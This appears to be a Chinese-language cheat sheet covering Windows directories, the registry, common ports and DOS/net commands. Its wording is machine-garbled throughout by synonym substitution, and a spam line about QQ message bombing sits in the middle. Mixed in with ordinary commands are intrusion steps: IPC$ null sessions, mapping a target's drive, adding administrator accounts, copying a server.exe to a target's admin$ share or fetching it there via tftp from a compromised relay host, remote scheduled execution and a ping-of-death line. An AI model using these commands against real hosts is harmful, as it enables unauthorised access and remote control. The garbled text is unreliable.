一、Window告急目次

1.ProgramData：C:\ProgramData 是个公用的被创建文件夹或文件存放的地方，这些文件夹或文件仅由创建者完备控制。programdata是电脑C盘的一个体系文件夹

2.Program Files和Program Files（86）：步伐软件默认安装目次，它们的区别是前者是安装64位软件，后者是安装32位软件

3.Window：体系安装目次

4.C:Windows\System32\config\ SAM：存储体系用户名和暗码

5.C:Windows\System32\drivers\etc\hosts:   host是一个没有扩展名的体系文件，可以用记事本等工具打开，其作用就是将一些常用的网址域名与其对应的IP地点创建一个关联“数据库”，当用户在欣赏器中输入一个须要登录的网址时，体系会起首主动从hosts文件中探求对应的IP地点，一旦找到，体系会立即打开对应网页，如果没有找到，则体系再见将网址提交DNS域名剖析服务器举行IP地点的剖析

二、注册表

1、简介：注册表（Registry，繁体中文版Windows利用体系称之为登录档）是Microsoft Windows中的一个告急的数据库，用于存储体系和应用步伐的设置信息。

2.作用：注册表是windows利用体系中的一个核心数据库，此中存放着各种参数，直接控制着windows的启动、硬件驱动步伐的装载以及一些windows应用步伐的运行，从而在整个体系中起着核心作用。这些作用包罗了软、硬件的干系设置和状态信息，比如注册表中生存有应用步伐和资源管理器外壳的初始条件、首选项和卸载数据等，联网盘算机的整个体系的设置和各种允许，文件扩展名与应用步伐的关联，硬件部件的形貌、状态和属性，性能记载和其他底层的体系状态信息，以及其他数据等。

三、盘算机服务名称

1．万维网（WWW）
万维网（World Wide Web，简称WWW）是瑞士日内瓦欧洲粒子实行室开始开辟的一个分布式超媒体信息查询体系，现在它是因特网上最为先辈、交互性能最好、应用最为广泛的信息检索工具，万维网包罗各种各样的信息，如：文本、声音、图像、视频等。万维网采取了"超文本"的技能，使得用户以通用而简单的办法就可得到因特网上的各种信息。
2．电子邮件（E-mail）
电子邮件（Electronic mail，简写为E-mail）是因特网上利用最广泛的一种服务。用户只要能与因特网毗连，具有能收发电子邮件步伐及个人的电子邮件地点，就可以与因特网上具有电子邮件地点的全部效户方便、快捷、经济地交换电子邮件。电子邮件可以在两个用户间交换，也可以向多个用户发送同一封邮件，或将收到的邮件转发给别的用户。电子邮件中除文本外，还可包罗声音、图像、应用步伐等各类盘算机文件。别的，用户还可以以邮件方式在网上订阅电子杂志、获取所需文件、加入有关的公告和讨论组等。
3．文本传输协议（FTP）
文本传输协议（File Transfer Protocol，简称FTP）是因特网上文件传输的底子，通常所说的FTP是基于该协议的一种服务。FTP文本传输服务允许因特网上的用户将一台盘算机上的文件传输到另一台上，险些全部范例的文件，包罗文本文件、二进制可实行文件、声音文件、图像文件、数据压缩文件等，都可以用FTP传送。
FTP现实上是一套文件服务软件，它以文件传输为界面，利用简单的get和put下令就可以举行文件的下载和上传，如同在因特网上实行文件复制下令一样。大多数FTP服务器主机都采取UNIX利用体系，但平凡用户通过Windows98和Windows XP也能方便地利用FTP和UNIX主机举行文件的传输。
FTP最大的特点是用户可以利用因特网上浩繁的匿名FTP服务器。所谓匿名服务器，指的是不须要专门的用户名和口令就可以进入的体系。用户毗连匿名服务器时，都可以用"Anonymous"（匿名）作为用户名、以自己的电子邮件地点作为口令登录。登录乐成后，用户便可从匿名服务器上下载文件。匿名服务器的标准目次为pub，用户通常可以访问该目次下全部子目次中的文件。思量到安全标题，大多数匿名服务器不允许用户上传文件。
4．长途登录（Telnet）
Telnet是长途登录服务的一个协议，该协议界说了长途登任命户与服务器交互的方式。允许用户在一台联网的盘算机登录到一个长途分时体系时，然后像利用自己的盘算机一样利用该长途体系。
要利用长途登录服务，必须在本土地算机上启动一个客户应用步伐，指定长途盘算机的名字，并通过因特网与之创建毗连。一旦毗连乐成，本土地算机就像通常的终端一样，直接访问长途盘算机体系的资源。长途登软件允许用户直接与长途盘算机交互，通过键盘或鼠标利用，客户应用步伐将有关的信息发送给长途盘算机，再由长途盘算机将输出结果返回给用户。用户退出长途登录后，用户的键盘、表现控制权又回到本土地算机。一样平常用户可通过Windows XP的Telnet客房步伐举行长途登录。
5．专题讨论（Usenet）
Usenet是一个有浩繁意见意义相投的用户共同构造起来的各种专题讨论组的聚集。通常也将之称为环球性的电子公告板体系（BBS）。Usenet用于发布公告、消息、批评及各种文章供网上用户利用和讨论。讨论内容按差别的专题分类构造，每一类为一个专题组，称为消息组，其内部还可以分出更多的子专题。
Usenet的每一个消息组都由一个区分范例的标记引导，每个消息组围绕一个主题，如comp.（盘算机方面的内容）、news.（Usenet自己的消息与消息）、rec.（体育、艺术及娱乐运动）、sci.（科学技能）、soc.（社会标题）、talk.（讨论交换）、misc.（别的杂项话题）、biz.（商业方面标题）等。
用户除了可以选择加入感爱好的专题小组外，也可以自己开设新的专题组。只要有人加入该专题组就可以不绝存在下去；若一段时间无人加入，则这个专题组会被主动删除。
6．Internet闲谈
Internet闲谈就是我们熟悉的IRC，即Internet Relay Chat。如果说电子邮件、网络消息是因特网上的存储转发的通讯业务，即可以使吸取者在得当的时间看到的话，那么，IRC就是因特网上的一个及时通讯业务，它可以使吸取者和发送者都处于联机状态，使他们直接在因特网上举行攀谈。可以利用这种方式召开网上集会，使网络上的干系用户可以直接及时地就某些标题举行讨论，并提出管理方案。现在国内较著名的中文谈天软件有藤讯公司的OICQ等

四、常用端口

21端口：21端口告急用于ftp（file transfer protocol，文件传输协议）服务。

23端口：23端口告急用于telnet（长途登录）服务，是internet上广泛采取的登录和仿真步伐。

 25端口：25端口为smtp（simple mail transfer protocol，简单邮件传输协议）服务器所开放，告急用于发送邮件，现在绝大多数邮件服务器都利用该协议。

53端口：53端口为dns（domain name server，域名服务器）服务器所开放，告急用于域名剖析，dns服务在nt体系中利用的最为广泛。

67、68端口：67、68端口分别是为bootp服务的bootstrap protocol server（引导步伐协议服务端）和bootstrap protocol client（引导步伐协议客户端）开放的端口。

69端口：tftp是cisco公司开辟的一个简单文件传输协议，雷同于ftp。 79端口：79端口是为finger服务开放的，告急用于查询长途主机在线用户、利用体系范例以及是否缓冲区溢出等用户的详细信息。

80端口：80端口是为http（hypertext transport protocol，超文本传输协议）开放的，这是上网冲浪利用最多的协议，告急用于在www（world wide web，万维网）服务上传输信息的协议。

99端口：99端口是用于一个名为“metagram relay”（亚对策延时）的服务，该服务比力少见，一样平常是用不到的。

109、110端口：109端口是为pop2（post office protocol version 2，邮局协议2）服务开放的，110端口是为pop3（邮件协议3）服务开放的，pop2、pop3都是告急用于吸取邮件的。

111端口：111端口是sun公司的rpc（remote procedure call，长途过程调用）服务所开放的端口，告急用于分布式体系中差别盘算机的内部进程通讯，rpc在多种网络服务中都是很告急的组件。

113端口：113端口告急用于windows的“authentication service”（验证服务）。

 119端口：119端口是为“network news transfer protocol”（网络消息组传输协议，简称nntp）开放的。

135端口：135端口告急用于利用rpc（remote procedure call，长途过程调用）协议并提供dcom（分布式组件对象模子）服务。

 137端口：137端口告急用于“netbios name service”（netbios名称服务）。

139端口：139端口是为“netbios session service”提供的，告急用于提供windows文件和打印机共享以及unix中的samba服务。

 143端口：143端口告急是用于“internet message access protocol”v2（internet消息访问协议，简称imap）。

 161端口：161端口是用于“simple network management protocol”（简单网络管理协议，简称snmp）。

 443端口：43端口即网页欣赏端口，告急是用于https服务，是提供加密和通过安全端口传输的另一种http。

 554端口：554端口默认情况下用于“real time streaming protocol”（及时流协议，简称rtsp）。

1024端口：1024端口一样平常不固定分配给某个服务，在英文中的表明是“reserved”（保存）。

1080端口：1080端口是socks署理服务利用的端口，各人平常上网利用的www服务利用的是http协议的署理服务。

 1755端口：1755端口默认情况下用于“microsoft media server”（微软媒体服务器，简称mms）。

 4000端口：4000端口是用于各人常常利用的 谈天工具的，再细说就是为 客户端开放的端口， 服务端利用的端口是8000。

 5554端口：在本年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波（worm.sasser），该病毒可以利用tcp 5554端口开启一个ftp服务，告急被用于病毒的流传。

 5632端口：5632端口是被各人所熟悉的长途控制软件pcanywhere所开启的端口。

 8080端口：8080端口同80端口，是被用于www署理服务的，可以实现网页端口概念 在网络技能中，端口（port）大抵有两种意思：一是物理意义上的端口，比如，adsl modem、集线器、交换机、路由器用于毗连其他网络装备的接口，如rj-45端口、sc端口等等。二是逻辑意义上的端口，一样平常是指tcp/ip协议中的端口，端标语的范围从0到65535，比如用于欣赏网页服务的80端口，用于ftp服务的21端口等等。 们这里将要先容的就是逻辑意义上的端口。

3306端口：mysql

1433端口：sqlserver

1521端口：oracle

3389： 长途桌面

五、常用DOS下令

dir (directory) ：列出当前目次下的文件以及文件夹
md (make directory)： 创建目次
rd (remove directory)：删除目次
cd (change directory)：进入指定目次
cd.. : 退回到上一级目次
cd\ : 退回到根目次
del：删除文件
exit：退出dos下令行
cls (clear screen): 清屏

net use ipipc$ " " /user:" " 创建IPC空链接
net use ipipc$ "暗码" /user:"用户名" 创建IPC非空链接
net use h: ipc$ "暗码" /user:"用户名" 直接登岸后映射对方C：到当地为H:
net use h: ipc$ 登岸后映射对方C：到当地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到当地的为H:的映射
net user 用户名 暗码 /add 创建用户
net user guest /active:yes 激活guest用户
net user 检察有哪些用户
net user 帐户名 检察帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,留意：administrator后加s用复数
net start 检察开启了哪些服务
net start 服务名 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 克制某服务
net time 目标ip 检察对方时间
net time 目标ip /set 设置本土地算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 检察当地局域网内开启了哪些共享
net view ip 检察对方局域网内开启了哪些共享
net config 表现体系网络设置
net logoff 断开毗连的共享
net pause 服务名 停息某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在利用的网络毗连范例和信息
net share 检察当地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登岸后用将暗码改为12345
net password 暗码 更改体系登岸暗码
netstat -a 检察开启了哪些端口,常用netstat -an
netstat -n 检察端口的网络毗连情况，常用netstat -an
netstat -v 检察正在举行的工作
netstat -p 协议名 例：netstat -p tcq/ip 检察某协议利用情况（检察tcp/ip协议利用情况）
netstat -s 检察正在利用的全部协议利用情况
nbtstat -A ip 对方136到139此中一个端口开了的话，就可检察对方近来登岸的用户名（03前的为用户名）-留意：参数-A要大写
tracert -参数 ip(或盘算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时隔断。
ping ip(或域名) 向对方主机发送默认巨细为32字节的数据，参数：“-l[空格]数据包巨细”；“-n发送数据次数”；“-t”指不绝ping。
ping -t -l 65550 ip 殒命之ping(发送大于64K的文件并不绝ping就成了殒命之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)检察当地ip地点，ipconfig可用参数“/all”表现全部设置信息
tlist -t 以树行列表表现进程(为体系的附加工具，默认是没有安装的，在安装目次的Support/tools文件夹内)
kill -F 进程名 加-F参数后欺压竣事某进程(为体系的附加工具，默认是没有安装的，在安装目次的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表现删除只读、潜伏、体系、存档文件，/A-R、/A-H、/A-S、/A-A表现删除除只读、潜伏、体系、存档以外的文件。
          比方“DEL/AR *.*”表现删除当前目次下全部只读文件，“DEL/A-S *.*”表现删除当前目次下除体系文件以外的全部文件

怎样qq轰炸别人手机 怎样qq多次发送消息 教你怎样用记事本创建一个微信 QQ轰炸器 通讯软件通用！
del /S /Q 目次 或用：rmdir /s /Q 目次 /S删除目次及目次下的全部子目次和文件。同时利用参数/Q 可取消删除利用时的体系确认就直接删除。（二个下令作用雷同）
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目次存在雷同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把差别之处输出到3st.txt文件中，"> "和"> >" 是重定向下令
at id号 开启已注册的某个筹划任务
at /delete 克制全部筹划任务，用参数/yes则不须要确认就直接克制
at id号 /delete 克制某个已注册的筹划任务
at 检察全部的筹划任务
at ip time 步伐名(或一个下令) /r 在某时间运行对方某步伐并重新启动盘算机
finger username @host 检察近来有哪些用户登岸
telnet ip 端口 远和登岸服务器,默认端口为23
open ip 毗连到IP（属telnet登岸后的下令）
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目次为文件2，用参数/y就同时取消确认你要改写一份现存目次文件
copy c:srv.exe ipadmin$ 复制当地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中天生3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（全部文件）至当地C：
xcopy 要复制的文件或目次树 目标地点目次名 复制文件和目次树，用参数/Y将不提示覆盖雷同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登岸后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）举行传送

tftp -i 对方IP put c:server.exe 登岸后，上传当地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或举行文件利用，默认端口为21。bin指用二进制方式传送（可实行文件进）；默以为ASCII格式传送(文本文件时)
route print 表现出IP路由，将告急表现网络地点Network addres，子网掩码Netmask，网关地点Gateway addres，接口地点Interface
arp 检察和处理处罚ARP缓存，ARP是名字剖析的意思，负责把一个IP剖析成一个物理性的MAC地点。arp -a将表现出全部信息
start 步伐名或下令 /max 或/min 新开一个新窗口并最大化（最小化）运行某步伐或下令
mem 检察cpu利用情况
attrib 文件名(目次名) 检察某文件（目次）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，体系，潜伏 属性；用＋则是添加为某属性
dir 检察文件，参数：/Q表现文件及目次属体系哪个用户，/T:C表现文件创建时间，/T:A表现文件前次被访问时间，/T:W前次被修改时间
date /t 、 time /t 利用此参数即“DATE/T”、“TIME/T”将只表现当前日期和时间，而不必输入新日期和时间
set 指定情况变量名称=要指派给变量的字符 设置情况变量
set 表现当前全部的情况变量
set p(或别的字符) 表现出当前以字符p(或别的字符)开头的全部情况变量
pause 停息批处理处罚步伐，并表现出：请按恣意键继承....
if 在批处理处罚步伐中实行条件处理处罚（更多分析见if下令及变量）
goto 标签 将cmd.exe导向到批处理处罚步伐中带标签的行（标签必须单独一行，且以冒号打头，比方：“：start”标签）
call 路径批处理处罚文件名 从批处理处罚步伐中调用另一个批处理处罚步伐 （更多分析见call /?）
for 对一组文件中的每一个文件实行某个特定下令（更多分析见for下令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则表现当前echo设置
echo 信息 在屏幕上表现出信息
echo 信息 >> pass.txt 将"信息"生存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中探求字符串hello
find 文件名 查找某文件.